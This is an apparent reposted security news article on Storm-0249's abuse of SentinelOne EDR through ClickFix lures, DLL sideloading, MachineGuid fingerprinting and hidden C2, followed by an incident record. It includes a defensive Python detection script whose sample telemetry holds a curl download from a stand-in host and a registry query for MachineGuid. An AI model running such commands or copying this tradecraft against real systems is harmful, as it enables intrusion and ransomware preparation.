SentinelOne: Ransomware IAB abuses EDR for stealthy malware execution

**Storm-0249 Exploits EDR Solutions in Stealthy Ransomware Prep Attacks**

A threat actor tracked as Storm-0249 is leveraging endpoint detection and response (EDR) solutions and trusted Windows utilities to deploy malware, establish persistence, and prepare for ransomware attacks. Cybersecurity firm ReliaQuest observed the group moving beyond traditional phishing tactics, adopting more sophisticated methods that evade detection even in well-defended environments.

In a recent attack, Storm-0249 abused SentinelOne EDR components, though researchers note the technique is not specific to SentinelOne and could apply to other EDR products. The campaign began with ClickFix social engineering: users were tricked into pasting a curl command into the Windows Run dialog, which downloaded a malicious MSI package that was then installed with SYSTEM privileges. A PowerShell script, fetched from a spoofed Microsoft domain, was loaded directly into memory to avoid leaving a payload on disk for file-based scanning to find.

The MSI file dropped a malicious DLL (SentinelAgentCore.dll) alongside the legitimate SentinelAgentWorker.exe, a trusted SentinelOne EDR process. Through DLL sideloading, the attacker ran malicious code inside that signed, privileged process, blending in with routine EDR activity and evading security tooling that trusts the host process. Because the DLL is loaded whenever the worker starts, the persistence survived OS updates.

Once inside, Storm-0249 used the compromised EDR process to collect system identifiers via legitimate Windows utilities (reg.exe, findstr.exe). Among them was MachineGuid, the per-installation identifier Windows stores in the registry under HKLM\SOFTWARE\Microsoft\Cryptography, which ransomware families such as LockBit and ALPHV use to fingerprint victims. Encrypted HTTPS command-and-control (C2) traffic was then funnelled through the trusted process, so network monitoring that allowlists EDR traffic saw nothing unusual.

The attack highlights a growing trend of abusing signed, trusted processes to conduct malicious activity without raising alarms. ReliaQuest notes that behaviour-based detection, such as flagging a trusted process that loads an unsigned DLL or a DLL from an unexpected path, could help mitigate such threats. Additionally, stricter controls on curl, PowerShell, and other living-off-the-land binaries (LoLBins) may reduce exposure.
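The detection points above (curl launched from the Run dialog, an EDR worker loading an unsigned DLL, an EDR worker spawning reg.exe or findstr.exe to read MachineGuid) can be expressed as rules over endpoint telemetry. The following is an added example, not code from ReliaQuest, BleepingComputer or SentinelOne: it runs three such rules over a handful of constructed Sysmon-style records (Event ID 7 ImageLoad and Event ID 1 ProcessCreate field names). The EDR process names, the install-directory and signer allowlists, and every sample event are assumptions made for the example.

```python
"""Behaviour-based detections for the Storm-0249 tradecraft, over constructed Sysmon-style events."""
import ntpath

# ASSUMPTION: EDR worker binaries and where they are expected to live. SentinelOne's
# real install tree may differ; adjust to the product and version you run.
EDR_PROCESSES = {"sentinelagentworker.exe", "sentinelagent.exe"}
EDR_INSTALL_PREFIX = r"c:\program files\sentinelone\\".rstrip("\\") + "\\"
ALLOWED_DLL_DIRS = (EDR_INSTALL_PREFIX, r"c:\windows\\".rstrip("\\") + "\\")
ALLOWED_SIGNER_FRAGMENTS = ("microsoft", "sentinelone")   # ASSUMPTION: expected DLL signers

# LoLBins the article names for the fingerprinting step.
FINGERPRINT_LOLBINS = {"reg.exe", "findstr.exe"}


def _base(path):
    """Lower-cased file name of a Windows path (works on any host)."""
    return ntpath.basename(path or "").lower()


def unsigned_dll_in_trusted_process(ev: dict) -> bool:
    """Sysmon ID 7: an EDR worker loads a DLL that is unsigned, has a non-valid signature,
    is signed by an unexpected party, or sits outside the EDR install tree and C:\\Windows.
    Sysmon's Signed/Signature/SignatureStatus fields describe ImageLoaded, not the loader."""
    if ev.get("EventID") != 7 or _base(ev.get("Image")) not in EDR_PROCESSES:
        return False
    dll = (ev.get("ImageLoaded") or "").lower()
    if not dll.endswith(".dll"):
        return False
    unsigned = str(ev.get("Signed", "false")).lower() != "true" \
        or ev.get("SignatureStatus") != "Valid"
    signer = (ev.get("Signature") or "").lower()
    signer_ok = any(frag in signer for frag in ALLOWED_SIGNER_FRAGMENTS)
    in_allowed_dir = dll.startswith(ALLOWED_DLL_DIRS)
    return unsigned or not signer_ok or not in_allowed_dir


def edr_process_spawns_fingerprinting_lolbin(ev: dict) -> bool:
    """Sysmon ID 1: an EDR worker is the parent of reg.exe or findstr.exe. An EDR agent has no
    reason to shell out to these; reg.exe against HKLM\\SOFTWARE\\Microsoft\\Cryptography is
    how MachineGuid is read."""
    if ev.get("EventID") != 1 or _base(ev.get("ParentImage")) not in EDR_PROCESSES:
        return False
    return _base(ev.get("Image")) in FINGERPRINT_LOLBINS


def curl_from_run_dialog(ev: dict) -> bool:
    """Sysmon ID 1: curl.exe started by explorer.exe (the Run dialog's parent) with a URL and
    an output flag, the ClickFix download stage."""
    if ev.get("EventID") != 1 or _base(ev.get("Image")) != "curl.exe":
        return False
    cmd = " " + (ev.get("CommandLine") or "").lower() + " "
    return _base(ev.get("ParentImage")) == "explorer.exe" \
        and "http" in cmd and (" -o " in cmd or "--output" in cmd)


RULES = {
    "curl_from_run_dialog": curl_from_run_dialog,
    "unsigned_dll_in_trusted_process": unsigned_dll_in_trusted_process,
    "edr_process_spawns_fingerprinting_lolbin": edr_process_spawns_fingerprinting_lolbin,
}


def run_detections(events):
    """Return (rule_name, event_index) for every rule that fires on every event."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry (not real logs). Paths and hostnames are made up.
WORKER = r"C:\Program Files\SentinelOne\Sentinel Agent 24.1.2\SentinelAgentWorker.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",            # 0: ClickFix stage
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"curl https://update.example.invalid/setup.msi -o C:\Users\jdoe\AppData\Local\Temp\setup.msi"},
    {"EventID": 7, "Image": WORKER,                                      # 1: benign system DLL
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": WORKER,                                      # 2: sideloaded DLL
     "ImageLoaded": r"C:\Program Files\SentinelOne\Sentinel Agent 24.1.2\SentinelAgentCore.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",             # 3: fingerprinting
     "ParentImage": WORKER,
     "CommandLine": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",             # 4: benign admin use
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
]

if __name__ == "__main__":
    for name, idx in run_detections(SAMPLE_EVENTS):
        print(f"{name}: event {idx} {SAMPLE_EVENTS[idx].get('Image')}")
```

The allowlists are the part worth tuning: the unsigned-DLL rule deliberately accepts Microsoft and SentinelOne signers from the install tree and C:\Windows, because an EDR worker legitimately loads system DLLs, and fires on anything else, which is exactly the case of a DLL dropped beside the worker. The reg.exe rule keys on the parent process rather than the command line, so it catches the collection step even if the attacker switches to a different registry value.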

Storm-0249’s tactics suggest a shift toward initial access operations tailored for ransomware affiliates, emphasizing stealth and persistence over broad, noisy campaigns.

Source: https://www.bleepingcomputer.com/news/security/ransomware-iab-abuses-edr-for-stealthy-malware-execution/

SentinelOne cybersecurity rating report: https://www.rankiteo.com/company/sentinelone

"id": "SEN1765296030",
"linkid": "sentinelone",
"type": "Ransomware",
"date": "12/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'attack_vector': ['Social Engineering (ClickFix)',
                   'DLL Sideloading',
                   'Malicious MSI Package'],
 'data_breach': {'sensitivity_of_data': 'Per-installation machine identifier '
                                        '(registry-stored) used by ransomware '
                                        'for encryption key binding',
                 'type_of_data_compromised': 'System identifiers '
                                             '(MachineGuid)'},
 'description': 'An initial access broker tracked as Storm-0249 is abusing '
                'endpoint detection and response (EDR) solutions and trusted '
                'Microsoft Windows utilities to load malware, establish '
                'communication, and persistence in preparation for ransomware '
                'attacks. The threat actor leveraged SentinelOne EDR '
                'components to hide malicious activity, though the method '
                'works with other EDR products. The attack involved ClickFix '
                'social engineering, malicious MSI packages, and DLL '
                'sideloading to evade detection and maintain persistence.',
 'impact': {'operational_impact': 'Stealthy persistence and '
                                  'command-and-control (C2) communication'},
 'initial_access_broker': {'backdoors_established': 'DLL sideloading via '
                                                    'SentinelAgentWorker.exe',
                           'entry_point': 'ClickFix social engineering and '
                                          'malicious MSI packages'},
 'lessons_learned': 'Abuse of trusted EDR processes can bypass traditional '
                    'monitoring. Behavior-based detection and stricter '
                    'controls for utilities like curl, PowerShell, and LoLBins '
                    'are recommended.',
 'motivation': 'Initial access for ransomware affiliates',
 'post_incident_analysis': {'corrective_actions': ['Behavior-based detection '
                                                   'for unsigned DLL loading',
                                                   'Stricter controls for '
                                                   'utilities like curl and '
                                                   'PowerShell'],
                            'root_causes': 'Abuse of trusted EDR processes and '
                                           'signed executables for stealthy '
                                           'persistence and C2 communication'},
 'recommendations': ['Implement behavior-based detection to identify trusted '
                     'processes loading unsigned DLLs from non-standard paths',
                     'Set stricter controls for curl, PowerShell, and LoLBin '
                     'execution'],
 'references': [{'source': 'ReliaQuest'}],
 'response': {'enhanced_monitoring': 'Behavior-based detection for trusted '
                                     'processes loading unsigned DLLs',
              'third_party_assistance': 'ReliaQuest (cybersecurity company)'},
 'threat_actor': 'Storm-0249',
 'title': 'Storm-0249 Abuses EDR Solutions for Stealthy Ransomware Attacks',
 'type': 'Ransomware Preparation',
 'vulnerability_exploited': 'Abuse of trusted EDR processes and signed '
                            'executables'}